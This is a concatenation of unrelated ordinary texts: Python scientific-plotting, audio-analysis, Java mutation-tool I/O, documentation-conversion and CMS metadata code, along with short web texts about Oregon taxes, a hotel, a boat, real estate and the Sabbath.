frame[np.isnan(frame)] = 0.0 # Add mask if present if label in self.masks: frame[self.masks[label]] = float('nan') ax.imshow(frame, vmin=min_value, vmax=max_value, cmap=cmap, origin='lower', norm=norm, interpolation="nearest", aspect=1) # Add region if present if label in self.regions: for patch in self.regions[label].to_mpl_patches(): ax.add_patch(patch) # Add the label ax.text(0.95, 0.95, label, color='white', transform=ax.transAxes, fontsize=10, va="top", ha="right") # fontweight='bold' #ax.coords.grid(color='white') counter += 1 all_axes = self._figure.get_axes() # show only the outside spines for ax in all_axes: for sp in ax.spines.values(): sp.set_visible(False) #if ax.is_first_row(): # ax.spines['top'].set_visible(True) #if ax.is_last_row(): # ax.spines['bottom'].set_visible(True) #if ax.is_first_col(): # ax.spines['left'].set_visible(True) #if ax.is_last_col(): # ax.spines['right'].set_visible(True) # Add a colourbar #axisf3 = self._figure.add_axes(gs[row, col+1:]) subplotspec = gs[row, col+1:] points = subplotspec.get_position(self._figure).get_points() #print("colorbar points:", points) x_min = points[0,0] x_max = points[1,0] y_min = points[0,1] y_max = points[1,1] #print((x_min, x_max), (y_min, y_max)) #points_flattened = points.flatten() #print("colorbar:", points_flattened) x_center = 0.5 * (x_min + x_max) y_center = 0.5 * (y_min + y_max) width = 0.9* (x_max - x_min) height = 0.2 * (y_max - y_min) x_min = x_center - 0.5 * width x_max = x_center + 0.5 * width y_min = y_center - 0.5 * height y_max = y_center + 0.5 * height #ax_cm = plt.subplot(points) #ax_cm = plt.axes(points_flattened) ax_cm = self._figure.add_axes([x_min, y_min, width, height]) cm_cm = cm.get_cmap(self.colormap) norm_cm = mpl_colors.Normalize(vmin=0, vmax=1) cb = mpl_colorbar.ColorbarBase(ax_cm, cmap=cm_cm, norm=norm_cm, orientation='horizontal') cb.set_label('Flux (arbitrary units)') # Set the title if self.title is not None: self._figure.suptitle("\n".join(wrap(self.title, 60))) #plt.tight_layout() # Debugging if type(path).__name__ == "BytesIO": log.debug("Saving the SED plot to a buffer ...") elif path is None: log.debug("Showing the SED plot ...") else: log.debug("Saving the SED plot to " + str(path) + " ...") if path is not None: # Save the figure plt.savefig(path, bbox_inches='tight', pad_inches=0.25, transparent=self.transparent, format=self.format) else: plt.show() plt.close() # ----------------------------------------------------------------- # TODO: add option to plot histograms of the residuals (DL14) class ResidualImageGridPlotter(ImageGridPlotter): """ This class ... """ def __init__(self, title=None): """ The constructor ... """ # Call the constructor of the base class super(ResidualImageGridPlotter, self).__init__(title) # -- Attributes -- # Set the title self.title = title # The rows of the grid self.rows = OrderedDict() self.plot_residuals = [] # The names of the columns self.column_names = ["Observation", "Model", "Residual"] # Box (SkyRectangle) where to cut off the maps self.box = None self._plotted_rows = 0 self.absolute = False # ----------------------------------------------------------------- def set_bounding_box(self, box): """ This function ... :param box: :return: """ self.box = box # ----------------------------------------------------------------- def add_row(self, image_a, image_b, label, residuals=True): """ This function ... :param image_a: :param image_b: :param label: :param residuals: :return: """ self.rows[label] = (image_a, image_b) if residuals: self.plot_residuals.append(label) # ----------------------------------------------------------------- def set_column_names(self, name_a, name_b, name_residual="Residual"): """ This function ... :param name_a: :param name_b: :param name_residual: :return: """ self.column_names = [name_a, name_b, name_residual] # ----------------------------------------------------------------- def run(self, output_path): """ This function ... :param output_path: :return: """ # Make the plot self.plot(output_path) # ----------------------------------------------------------------- def clear(self): """ This function ... :return: """ # Set default values for all attributes self.title = None self.rows = OrderedDict() self.plot_residuals = [] self.column_names = ["Observation", "Model", "Residual"] self._figure = None self._grid = None self._plotted_rows = 0 # ----------------------------------------------------------------- def plot(self, path): """ This function ... :param path: :return: """ # Determine the wcs with the smallest pixelscale reference_wcs = None for label in self.rows: if reference_wcs is None or reference_wcs.average_pixelscale > self.rows[label][0].average_pixelscale: reference_wcs = copy.deepcopy(self.rows[label][0].wcs) number_of_rows = len(self.rows) axisratio = float(self.rows[self.rows.keys()[0]][0].xsize) / float(self.rows[self.rows.keys()[0]][0].ysize) #print("axisratio", axisratio) one_frame_x_size = 3. fig_x_size = 3. * one_frame_x_size #fig_y_size = number_of_rows * one_frame_x_size / axisratio fig_y_size = one_frame_x_size * number_of_rows * 0.7 # Create a figure self._figure = plt.figure(figsize=(fig_x_size, fig_y_size)) self._figure.subplots_adjust(left=0.05, right=0.95) # Create grid self._grid = AxesGrid(self._figure, 111, nrows_ncols=(len(self.rows), 3), axes_pad=0.02, label_mode="L", share_all=True, cbar_location="right", cbar_mode="single", cbar_size="0.5%", cbar_pad="0.5%", ) # cbar_mode="single" for cax in self._grid.cbar_axes: cax.toggle_label(False) #rectangle_reference_wcs = self.box.to_pixel(reference_wcs) data = OrderedDict() greatest_shape = None if self.box is not None: for label in self.rows: wcs = self.rows[label][0].wcs rectangle = self.box.to_pixel(wcs) y_min = rectangle.lower_left.y y_max = rectangle.upper_right.y x_min = rectangle.lower_left.x x_max = rectangle.upper_right.x reference = self.rows[label][0][y_min:y_max, x_min:x_max] model = self.rows[label][1][y_min:y_max, x_min:x_max] data[label] = (reference, model) print(label, "box height/width ratio:", float(reference.shape[0])/float(reference.shape[1])) if greatest_shape is None or greatest_shape[0] < reference.shape[0]: greatest_shape = reference.shape else: for label in self.rows: reference = self.rows[label][0] model = self.rows[label][1] data[label] = (reference, model) if greatest_shape is None or greatest_shape[0] < reference.shape[0]: greatest_shape = reference.shape # Loop over the rows for label in self.rows: #wcs = self.rows[label][0].wcs if data[label][0].shape == greatest_shape: reference = data[label][0] model = data[label][1] else: factor = float(greatest_shape[0]) / float(data[label][0].shape[0]) order = 0 reference = ndimage.zoom(data[label][0], factor, order=order) model = ndimage.zoom(data[label][1], factor, order=order) if self.absolute: residual = model - reference else: residual = (model - reference)/model # Plot the reference image x0, x1, y0, y1, vmin, vmax = self.plot_frame(reference, label, 0) # Plot the model image x0, x1, y0, y1, vmin, vmax = self.plot_frame(model, label, 1, vlimits=(vmin,vmax)) # Plot the residual image x0, x1, y0, y1, vmin, vmax = self.plot_frame(residual, label, 2, vlimits=(vmin,vmax)) self._plotted_rows += 3 #self._grid.axes_llc.set_xlim(x0, x1) #self._grid.axes_llc.set_ylim(y0, y1) self._grid.axes_llc.set_xticklabels([]) self._grid.axes_llc.set_yticklabels([]) self._grid.axes_llc.get_xaxis().set_ticks([]) # To remove ticks self._grid.axes_llc.get_yaxis().set_ticks([]) # To remove ticks # Add title if requested #if self.title is not None: self._figure.suptitle(self.title, fontsize=12, fontweight='bold') plt.tight_layout() # Debugging log.debug("Saving the SED plot to " + path + " ...") # Save the figure plt.savefig(path, bbox_inches='tight', pad_inches=0.25, format=self.format, transparent=self.transparent) plt.close() # ----------------------------------------------------------------- def plot_frame(self, frame, row_label, column_index, borders=(0,0,0,0), vlimits=None): """ This function ... :param frame: :param column_index: :param row_label: :param borders: :param vlimits: :return: """ grid_index = self._plotted_rows + column_index x0 = borders[0] y0 = borders[1] #x1 = frame.xsize #y1 = frame.ysize x1 = frame.shape[1] y1 = frame.shape[0] #vmax = np.max(frame) # np.mean([np.max(data_ski),np.max(data_ref)]) #vmin = np.min(frame) # np.mean([np.min(data_ski),np.min(data_ref)]) #if min_int == 0.: min_int = vmin #else: vmin = min_int #if max_int == 0.: max_int = vmax #else: vmax = max_int if vlimits is None: min_value = self.vmin if self.vmin is not None else np.nanmin(frame) max_value = 0.5 * (np.nanmax(frame) + min_value) else: min_value = vlimits[0] max_value = vlimits[1] aspect = "equal" if column_index != 2: # Get the color map cmap = cm.get_cmap(self.colormap) # Set background color background_color = cmap(0.0) self._grid[grid_index].set_axis_bgcolor(background_color) # Plot frame[np.isnan(frame)] = 0.0 norm = ImageNormalize(stretch=LogStretch()) im = self._grid[grid_index].imshow(frame, cmap=cmap, vmin=min_value, vmax=max_value, interpolation="nearest", origin="lower", aspect=aspect, norm=norm) # 'nipy_spectral_r', 'gist_ncar_r' else: if self.absolute: # Get the color map cmap = cm.get_cmap(self.colormap) norm = ImageNormalize(stretch=LogStretch()) else: cmap = discrete_cmap() min_value = 0.001 max_value = 1. norm = None print(min_value, max_value) im = self._grid[grid_index].imshow(frame, cmap=cmap, vmin=min_value, vmax=max_value, interpolation="nearest", origin="lower", aspect=aspect, norm=norm) cb = self._grid[grid_index].cax.colorbar(im) # cb.set_xticklabels(labelsize=1) # grid[number+numb_of_grid].cax.toggle_label(True) for cax in self._grid.cbar_axes: cax.toggle_label(True) cax.axis[cax.orientation].set_label(' ') # cax.axis[cax.orientation].set_fontsize(3) cax.tick_params(labelsize=3) cax.set_ylim(min_value, max_value) # cax.set_yticklabels([0, 0.5, 1]) if column_index == 0: self._grid[grid_index].text(0.03, 0.95, row_label, color='black', transform=self._grid[grid_index].transAxes, fontsize=fsize + 2, fontweight='bold', va='top') # if numb_of_grid==0: # crea_scale_bar(grid[number+numb_of_grid],x0,x1,y0,y1,pix2sec) # crea_scale_bar(grid[number+numb_of_grid],x0,x1,y0,y1,pix2sec) return x0, x1, y0, y1, min_value, max_value # ----------------------------------------------------------------- fsize = 2 def sort_numbs(arr): numbers = [] for k in range(len(arr)): numb = str(arr[k].split('/')[-1].split('_')[-1].split('.fits')) #print numb numbers.append(numb) a = sorted(numbers) new_arr = [] for k in range(len(a)): ind = numbers.index(a[k]) new_arr.append(arr[ind]) return new_arr def line_reg(header1): ima_pix2sec = float(header1['PIXSCALE_NEW']) nx = int(header1['NAXIS1']) ny = int(header1['NAXIS2']) scale = int(round(nx/8.*ima_pix2sec,-1)) x2 = nx*9.8/10. x1 = x2 - scale/ima_pix2sec y1 = ny/7. y2 = y1 return x1,y1,x2,y2,scale # Define new colormap for residuals def discrete_cmap(N=8): # define individual colors as hex values cpool = [ '#000000', '#00EE00', '#0000EE', '#00EEEE', '#EE0000','#FFFF00', '#EE00EE', '#FFFFFF'] cmap_i8 = colors.ListedColormap(cpool[0:N], 'i8') cm.register_cmap(cmap=cmap_i8) return cmap_i8 def define_scale_bar_length(x_extent,pix2sec): scale_bar = round((x_extent * pix2sec) / 6.,0) return int(5. * round(float(scale_bar)/5.)) # Length of the bar in arcsec def crea_scale_bar(ax, x0, x1, y0, y1, pix2sec): offset_x_factor = 0.98 offset_y_factor = 0.1 x_extent = x1 - x0 scale_bar_length = define_scale_bar_length(x_extent, pix2sec) / 2. #### divide by 2 !!! xc = fabs(x1)-scale_bar_length/pix2sec - (1.-offset_x_factor)*(x1-x0) yc = fabs(y0) + (y1-y0)* offset_y_factor ax.errorbar(xc, yc, xerr=scale_bar_length/pix2sec,color='black',capsize=1,c='black') ax.text(xc, yc, str(int(scale_bar_length*2.))+'\"', color='black',fontsize=fsize+1, horizontalalignment='center', verticalalignment='bottom') # -----------------------------------------------------------------
Filed an OR 40P Part-Year Resident return for 2015? If both apply to you and you have received a letter from ODR with a proposed refund adjustment, then there is a good chance that their adjustment is incorrect – especially if they are proposing a lower tax amount that is equal to the tax on the OR-PTE-PY form, Section B, line 19a multiplied by your Oregon percentage from Form 40P, line 35. The OR-PTE-PY is new this year, and the worksheet in Section B can be very confusing the first time through, but the most important thing is the the worksheet already multiplies the tax amounts by the Oregon percentage and the Oregon non-passive percentage, so by the time you get to line 19a, it is already pro-rated. For this very reason, ODR lists specific instructions below line 19a “Don’t multiply the tax by the Oregon percentage as instructed on line 48 of the Form 40P.” . However, on the notice I received, they have done just that in their proposed tax number – they have multiplied the amount on line 19a from OR-PTE-PY Section B by the Oregon percentage, which is incorrect. We had even clearly marked box 47c on Form 40P as they requested, but they still made the error. The thing that frustrated me is that the return was transmitted on 4/14/16 and they had a letter sent out on 4/22/16, which means a machine is likely kicking these out without any manual review and this could result in a large number of erroneous tax refunds. This is a waste of everyone’s time and money, and coupled with the disastrous late release of OTTER 2016, I am starting to think Oregon needs to following Intel’s lead and clean house at ODR and OED.
import os import sys import numpy as np import math from scipy.signal import get_window import matplotlib.pyplot as plt sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../software/models/')) import utilFunctions as UF import harmonicModel as HM import sineModel as SM import stft import dftModel as DFT eps = np.finfo(float).eps """ A6Part1 - Estimate fundamental frequency in polyphonic audio signal Set the analysis parameters used within the function estimateF0() to obtain a good estimate of the fundamental frequency (f0) corresponding to one melody within a complex audio signal. The signal is a cello recording cello-double-2.wav, in which two strings are played simultaneously. One string plays a constant drone while the other string plays a simple melody. You have to choose the analysis parameter values such that only the f0 frequency of the simple melody is tracked. The input argument to the function is the wav file name including the path (inputFile). The function returns a numpy array of the f0 frequency values for each audio frame. For this question we take hopSize (H) = 256 samples. estimateF0() calls f0Detection() function of the harmonicModel.py, which uses the two way mismatch algorithm for f0 estimation. estimateF0() also plots the f0 contour on top of the spectrogram of the audio signal for you to visually analyse the performance of your chosen values for the analysis parameters. In this question we will only focus on the time segment between 0.5 and 4 seconds. So, your analysis parameter values should produce a good f0 contour in this time region. In addition to plotting the f0 contour on the spectrogram, this function also synthesizes the f0 contour. You can also evaluate the performance of your chosen analysis parameter values by listening to this synthesized wav file named 'synthF0Contour.wav' Since there can be numerous combinations of the optimal analysis parameter values, the evaluation is done solely on the basis of the output f0 sequence. Note that only the segment of the f0 contour between time 0.5 to 4 seconds is used to evaluate the performance of f0 estimation. Your assignment will be tested only on inputFile = '../../sounds/cello-double-2.wav'. So choose the analysis parameters using which the function estimates the f0 frequency contour corresponding to the string playing simple melody and not the drone. There is no separate test case for this question. You can keep working with the wav file mentioned above and when you think the performance is satisfactory you can submit the assignment. The plots can help you achieve a good performance. Be cautious while choosing the window size. Window size should be large enough to resolve the spectral peaks and small enough to preserve the note transitions. Very large window sizes may smear the f0 contour at note transitions. Depending on the parameters you choose and the capabilities of the hardware you use, the function might take a while to run (even half a minute in some cases). For this part of the assignment please refrain from posting your analysis parameters on the discussion forum. """ def estimateF0(inputFile = '../../sounds/cello-double-2.wav'): """ Function to estimate fundamental frequency (f0) in an audio signal. This function also plots the f0 contour on the spectrogram and synthesize the f0 contour. Input: inputFile (string): wav file including the path Output: f0 (numpy array): array of the estimated fundamental frequency (f0) values """ ### Change these analysis parameter values marked as XX window = 'blackman' M = 6096 N = 4096*4 f0et = 5.0 t = -60 minf0 = 40 maxf0 = 215 ### Do not modify the code below H = 256 #fix hop size fs, x = UF.wavread(inputFile) #reading inputFile w = get_window(window, M) #obtaining analysis window ### Method 1 f0 = HM.f0Detection(x, fs, w, N, H, t, minf0, maxf0, f0et) #estimating F0 startFrame = np.floor(0.5*fs/H) endFrame = np.ceil(4.0*fs/H) f0[:startFrame] = 0 f0[endFrame:] = 0 y = UF.sinewaveSynth(f0, 0.8, H, fs) UF.wavwrite(y, fs, 'synthF0Contour.wav') ## Code for plotting the f0 contour on top of the spectrogram # frequency range to plot maxplotfreq = 500.0 fontSize = 16 plot = 1 fig = plt.figure() ax = fig.add_subplot(111) mX, pX = stft.stftAnal(x, fs, w, N, H) #using same params as used for analysis mX = np.transpose(mX[:,:int(N*(maxplotfreq/fs))+1]) timeStamps = np.arange(mX.shape[1])*H/float(fs) binFreqs = np.arange(mX.shape[0])*fs/float(N) plt.pcolormesh(timeStamps, binFreqs, mX) plt.plot(timeStamps, f0, color = 'k', linewidth=1.5) plt.plot([0.5, 0.5], [0, maxplotfreq], color = 'b', linewidth=1.5) plt.plot([4.0, 4.0], [0, maxplotfreq], color = 'b', linewidth=1.5) plt.autoscale(tight=True) plt.ylabel('Frequency (Hz)', fontsize = fontSize) plt.xlabel('Time (s)', fontsize = fontSize) plt.legend(('f0',)) xLim = ax.get_xlim() yLim = ax.get_ylim() ax.set_aspect((xLim[1]-xLim[0])/(2.0*(yLim[1]-yLim[0]))) if plot == 1: #save the plot too! plt.autoscale(tight=True) plt.show() else: fig.tight_layout() fig.savefig('f0_over_Spectrogram.png', dpi=150, bbox_inches='tight') return f0
The Sabbath. Just another day? Or a special gift from God…a gift worth “keeping,” as he commands? This positive look at the Sabbath explains why and how to delight in that day as the opportunity reserved by God for his people to be refreshed in fellowship with him.
import fnmatch import io import os import shutil from typing import Dict, List class JavaIO(object): """ """ def __init__(self, verbose=False): self.verbose = False self.sourceDirectory = None self.targetDirectory = None self.fileList = list() def filterFiles(self, mode="blacklist", filterList=None): """ :param mode: :type mode: :param filterList: :type filterList: :return: :rtype: """ if filterList is None: return assert isinstance(filterList, list) assert mode == "blacklist" or mode == "whitelist" alteredList = list() packageList = list() cuList = list() for statement in filterList: if '\\' in statement or '/' in statement: cuList.append(statement) else: packageList.append(statement) for packageName in packageList: if str(packageName).strip() == "": continue # we need to do this so that we avoid partial matching dirList = list() dirList.append("") dirList.extend(packageName.strip().split(".")) dirList.append("") dirName = os.sep.join(dirList) alteredList.extend([x for x in self.fileList if dirName in os.sep.join(["", x, ""])]) for cuName in cuList: alteredList.extend([x for x in self.fileList if cuName in x]) if mode == "whitelist": self.fileList = list(set(alteredList)) elif mode == "blacklist": self.fileList = list(set(self.fileList) - set(alteredList)) def listFiles(self, targetPath=None, buildPath=None, filterList=None, filterType="blacklist", desiredType="*.java"): """ :param targetPath: :type targetPath: :param buildPath: :type buildPath: :param filterList: :type filterList: :param filterType: :type filterType: :param desiredType: :type desiredType: """ # print targetPath, desiredType self.sourceDirectory = targetPath self.targetDirectory = os.path.abspath(os.path.join(buildPath, "LittleDarwinResults")) for root, dirnames, filenames in os.walk(self.sourceDirectory): for filename in fnmatch.filter(filenames, desiredType): self.fileList.append(os.path.join(root, filename)) self.filterFiles(mode=filterType, filterList=filterList) if not os.path.exists(self.targetDirectory): os.makedirs(self.targetDirectory) def getFileContent(self, filePath=None): """ :param filePath: :type filePath: :return: :rtype: """ with io.open(filePath, mode='r', errors='replace') as contentFile: file_data = contentFile.read() normalizedData = str(file_data) return normalizedData def getAggregateComplexityReport(self, mutantDensityPerMethod: Dict[str, int], cyclomaticComplexityPerMethod: Dict[str, int], linesOfCodePerMethod: Dict[str, int]) -> Dict[str, List[int]]: """ :param mutantDensityPerMethod: :type mutantDensityPerMethod: :param cyclomaticComplexityPerMethod: :type cyclomaticComplexityPerMethod: :param linesOfCodePerMethod: :type linesOfCodePerMethod: :return: :rtype: """ aggregateReport = dict() methodList = set(mutantDensityPerMethod.keys()) methodList.update(cyclomaticComplexityPerMethod.keys()) methodList.update(linesOfCodePerMethod.keys()) for method in methodList: aggregateReport[method] = [mutantDensityPerMethod.get(method, 0), cyclomaticComplexityPerMethod.get(method, 1), linesOfCodePerMethod.get(method, 0)] return aggregateReport def generateNewFile(self, originalFile=None, fileData=None, mutantsPerLine=None, densityReport=None, aggregateComplexity=None): """ :param originalFile: :type originalFile: :param fileData: :type fileData: :param mutantsPerLine: :type mutantsPerLine: :param densityReport: :type densityReport: :param aggregateComplexity: :type aggregateComplexity: :return: :rtype: """ originalFileRoot, originalFileName = os.path.split(originalFile) targetDir = os.path.join(self.targetDirectory, os.path.relpath(originalFileRoot, self.sourceDirectory), originalFileName) if not os.path.exists(targetDir): os.makedirs(targetDir) if not os.path.isfile(os.path.join(targetDir, "original.java")): shutil.copyfile(originalFile, os.path.join(targetDir, "original.java")) if mutantsPerLine is not None and densityReport is not None and aggregateComplexity is not None: densityPerLineCSVFile = os.path.abspath(os.path.join(targetDir, "MutantDensityPerLine.csv")) complexityPerMethodCSVFile = os.path.abspath(os.path.join(targetDir, "ComplexityPerMethod.csv")) densityReportFile = os.path.abspath(os.path.join(targetDir, "aggregate.html")) if not os.path.isfile(complexityPerMethodCSVFile) or not os.path.isfile( densityPerLineCSVFile) or not os.path.isfile(densityReportFile): with open(densityPerLineCSVFile, 'w') as densityFileHandle: for key in sorted(mutantsPerLine.keys()): densityFileHandle.write(str(key) + ',' + str(mutantsPerLine[key]) + '\n') with open(complexityPerMethodCSVFile, 'w') as densityFileHandle: for key in sorted(aggregateComplexity.keys()): line = [str(key)] line.extend([str(x) for x in aggregateComplexity[key]]) densityFileHandle.write(";".join(line) + '\n') with open(densityReportFile, 'w') as densityFileHandle: densityFileHandle.write(densityReport) counter = 1 while os.path.isfile(os.path.join(targetDir, str(counter) + ".java")): counter += 1 targetFile = os.path.abspath(os.path.join(targetDir, str(counter) + ".java")) with open(targetFile, 'w') as contentFile: contentFile.write(fileData) if self.verbose: print("--> generated file: ", targetFile) return os.path.relpath(targetFile, self.targetDirectory)
New for 2019! Blue Moon will be joing the fleet early spring. Acres of space above and below decks, Blue Moon can comfortably accomodate up to 8 guests using the saloon conversion. We'll have 'proper' images of her once she arrives.
# # This file is part of CasADi. # # CasADi -- A symbolic framework for dynamic optimization. # Copyright (C) 2010 by Joel Andersson, Moritz Diehl, K.U.Leuven. All rights reserved. # # CasADi is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 3 of the License, or (at your option) any later version. # # CasADi is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with CasADi; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # from doxy2swig import * import sys import ipdb import texttable def astext(node,whitespace=False,escape=True): r = [] if node.nodeType == node.TEXT_NODE: d = node.data if escape: d = d.replace('\\', r'\\\\') d = d.replace('"', r'\"') if not(whitespace): d = d.strip() r.append(d) elif hasattr(node,'childNodes'): for node in node.childNodes: r.append(astext(node,whitespace=whitespace,escape=escape)) return (" ".join(r)).strip() class Doxy2SWIG_X(Doxy2SWIG): def clean_pieces(self, pieces): """Cleans the list of strings given as `pieces`. It replaces multiple newlines by a maximum of 2 and returns a new list. It also wraps the paragraphs nicely. """ ret = [] count = 0 for i in pieces: if i == '\n': count = count + 1 else: if i == '";': if count: ret.append('\n') elif count > 2: ret.append('\n\n') elif count: ret.append('\n'*count) count = 0 ret.append(i) _data = "".join(ret) ret = [] for i in _data.split('\n\n'): if i == 'Parameters:' or i == 'Exceptions:': ret.extend([i, '\n-----------', '\n\n']) elif i.find('// File:') > -1: # leave comments alone. ret.extend([i, '\n']) else: if i.strip().startswith(">"): _tmp = i.strip() else: _tmp = textwrap.fill(i.strip(), 80-4, break_long_words=False) _tmp = self.lead_spc.sub(r'\1"\2', _tmp) ret.extend([_tmp, '\n\n']) return ret def write(self, fname): o = my_open_write(fname) if self.multi: for p in self.pieces: o.write(p.encode("ascii","ignore")) else: for p in self.clean_pieces(self.pieces): o.write(p.encode("ascii","ignore")) o.close() def do_doxygenindex(self, node): self.multi = 1 comps = node.getElementsByTagName('compound') for c in comps: refid = c.attributes['refid'].value fname = refid + '.xml' if not os.path.exists(fname): fname = os.path.join(self.my_dir, fname) if not self.quiet: print "parsing file: %s"%fname p = Doxy2SWIG_X(fname, self.include_function_definition, self.quiet) p.generate() self.pieces.extend(self.clean_pieces(p.pieces)) def do_table(self, node): caption = node.getElementsByTagName("caption") if len(caption)==1: self.add_text(">" + astext(caption[0]).encode("ascii","ignore")+"\n") rows = [] for (i,row) in enumerate(node.getElementsByTagName("row")): rows.append([]) for (j,entry) in enumerate(row.getElementsByTagName("entry")): rows[i].append(astext(entry,escape=False).encode("ascii","ignore")) table = texttable.Texttable(max_width=80-4) table.add_rows(rows) d = table.draw() d = d.replace('\\', r'\\\\') d = d.replace('"', r'\"') self.add_text(d) self.add_text("\n") #print table.draw() #for row in rows: # self.add_text("*") # r = " " # for col in row: # r+=col+" | " # self.add_text(col[:-1]+"\n") #self.generic_parse(node, pad=1) def convert(input, output, include_function_definition=True, quiet=False): p = Doxy2SWIG_X(input, include_function_definition, quiet) p.generate() p.write(output) def main(): usage = __doc__ parser = optparse.OptionParser(usage) parser.add_option("-n", '--no-function-definition', action='store_true', default=False, dest='func_def', help='do not include doxygen function definitions') parser.add_option("-q", '--quiet', action='store_true', default=False, dest='quiet', help='be quiet and minimize output') options, args = parser.parse_args() if len(args) != 2: parser.error("error: no input and output specified") convert(args[0], args[1], False, options.quiet) if __name__ == '__main__': main()
Is a name Cn, with n in the range 0 to 15. System instruction with result. For more information, see Op0 equals 0b01, cache maintenance, TLB maintenance, and address translation instructions in the ARM Architecture Reference Manual ARMv8, for ARMv8-A architecture profile for the encodings of System instructions.
# this is based on jsarray.py # todo check everything :) from ..base import * try: import numpy except: pass @Js def ArrayBuffer(): a = arguments[0] if isinstance(a, PyJsNumber): length = a.to_uint32() if length!=a.value: raise MakeError('RangeError', 'Invalid array length') temp = Js(bytearray([0]*length)) return temp return Js(bytearray([0])) ArrayBuffer.create = ArrayBuffer ArrayBuffer.own['length']['value'] = Js(None) ArrayBuffer.define_own_property('prototype', {'value': ArrayBufferPrototype, 'enumerable': False, 'writable': False, 'configurable': False}) ArrayBufferPrototype.define_own_property('constructor', {'value': ArrayBuffer, 'enumerable': False, 'writable': False, 'configurable': True})
Property Location With a stay at Hotel Girassol in Funchal, you'll be convenient to Barreiros Stadium and Madeira Story Centre Museum. This 4-star hotel is within close proximity of Madeira Casino and Formosa Beach.Rooms Make yourself at home in one of the 134 guestrooms featuring minibars and flat-screen televisions. Rooms have private balconies. High-speed wired Internet access surcharge keeps you connected, and cable programming is available for your entertainment. Conveniences include phones and safes, and you can also request rollaway/extra beds.Rec, Spa, Premium Amenities Be sure to enjoy recreational amenities, including an outdoor pool, a sauna, and a fitness center. Additional features include babysitting/childcare and tour/ticket assistance.Dining Enjoy a meal at a restaurant, or stay in and take advantage of the hotel's room service during limited hours. Relax with your favorite drink at a bar/lounge or a poolside bar.Business, Other Amenities Featured amenities include high-speed wired Internet access surcharge, a 24-hour front desk, and multilingual staff. Event facilities at this hotel consist of conference space and meeting rooms. Free self parking is available onsite.
#!/usr/bin/env python # coding=utf-8 def func1(lens): for i in xrange(lens): print(i) def p1(): print(" ... 1") def p2(): print(" ... 2") def pxx(): print(" ... pxx") # test func def test_func(): print('\n------- test func ------') print("... style 1 ...") func1(3) print("... style 2 ...") f = func1 f(4) # not use: {1:'p1', ...} func_dict = {1: p1, 2:p2, 3:pxx} for x in func_dict.iterkeys(): print('--dict %s' % x) func_dict[x]() # object oriented programming # advanced programming class animal: def __init__(self, name): self.name = name print(self.name) def say_name(self): print(self.name) @staticmethod def say_no_name(): print('static method xxx') @staticmethod def print_help(): print('this is a class for gen animal') def test_animal(): print('\n--- test animal ---') a1 = animal(u'cat') a1.say_name() a1.say_no_name() animal.print_help() animal.say_no_name() class A(): def __init__(self, name): self.name = name print("constructor A was called!") print("name is %s" % self.name) class B(A): def __init__(self, name, age): A.__init__(self, name) self.age = age print("constructor B was called!") print("age is %d" % self.age) class C(B): def __init__(self, name, age): B.__init__(self, name, age) print("constructor C was called!") def test_contructor(): print('\n------- test constructor ------') c = C("ccc", 23) print("c's name is %s" % c.name) print("c's age is %s" % c.age) # if use var '__name', then can't use c.__name outside the class # also for method name, eg: # def __xxx() test_func() test_animal() test_contructor()
In Windsor Bay, there are about 52 homes that benefit from the advantages of belonging to a gated country club. If you have children, they can walk both to Spanish River High School and Omni Middle School. The Windsor Bay subdivision is built around a small lake. Interested in learning more about homes for sale in Windsor Bay at Woodfield Country Club? Read more, or browse through some of our great listings below.
from zeit.cms.content.interfaces import WRITEABLE_ALWAYS import grokcore.component as grok import lxml.objectify import zeit.cms.content.dav import zeit.content.image.interfaces import zeit.content.image.image import zope.component import zope.interface import zope.schema class ImageMetadata(object): zope.interface.implements(zeit.content.image.interfaces.IImageMetadata) zeit.cms.content.dav.mapProperties( zeit.content.image.interfaces.IImageMetadata, zeit.content.image.interfaces.IMAGE_NAMESPACE, ('alt', 'caption', 'links_to', 'nofollow', 'origin')) zeit.cms.content.dav.mapProperties( zeit.content.image.interfaces.IImageMetadata, 'http://namespaces.zeit.de/CMS/document', ('title',)) zeit.cms.content.dav.mapProperties( zeit.content.image.interfaces.IImageMetadata, zeit.content.image.interfaces.IMAGE_NAMESPACE, ('external_id',), writeable=WRITEABLE_ALWAYS) # XXX Since ZON-4106 there should only be one copyright and the api has # been adjusted to 'copyright'. For bw-compat reasons the DAV property is # still called 'copyrights' _copyrights = zeit.cms.content.dav.DAVProperty( zeit.content.image.interfaces.IImageMetadata['copyright'], 'http://namespaces.zeit.de/CMS/document', 'copyrights', use_default=True) @property def copyright(self): value = self._copyrights if not value: return # Migration for exactly one copyright (ZON-4106) if type(value[0]) is tuple: value = value[0] # Migration for nofollow (VIV-104) if len(value) == 2: value = (value[0], None, None, value[1], False) # Migration for companies (ZON-3174) if len(value) == 3: value = (value[0], None, None, value[1], value[2]) return value @copyright.setter def copyright(self, value): self._copyrights = value zeit.cms.content.dav.mapProperties( zeit.content.image.interfaces.IImageMetadata, 'http://namespaces.zeit.de/CMS/meta', ('acquire_metadata',)) def __init__(self, context): self.context = context @zope.interface.implementer(zeit.connector.interfaces.IWebDAVProperties) @zope.component.adapter(ImageMetadata) def metadata_webdav_properties(context): return zeit.connector.interfaces.IWebDAVProperties( context.context) @grok.implementer(zeit.content.image.interfaces.IImageMetadata) @grok.adapter(zeit.content.image.interfaces.IImage) def metadata_for_image(image): metadata = ImageMetadata(image) # Be sure to get the image in the repository parent = None if image.uniqueId: image_in_repository = parent = zeit.cms.interfaces.ICMSContent( image.uniqueId, None) if image_in_repository is not None: parent = image_in_repository.__parent__ if zeit.content.image.interfaces.IImageGroup.providedBy(parent): # The image *is* in an image group. if metadata.acquire_metadata is None or metadata.acquire_metadata: group_metadata = zeit.content.image.interfaces.IImageMetadata( parent) if zeit.cms.workingcopy.interfaces.ILocalContent.providedBy(image): for name, field in zope.schema.getFieldsInOrder( zeit.content.image.interfaces.IImageMetadata): value = getattr(group_metadata, name, None) setattr(metadata, name, value) metadata.acquire_metadata = False else: # For repository content return the metadata of the group. metadata = group_metadata return metadata @grok.adapter(zeit.content.image.image.TemporaryImage) @grok.implementer(zeit.content.image.interfaces.IImageMetadata) def 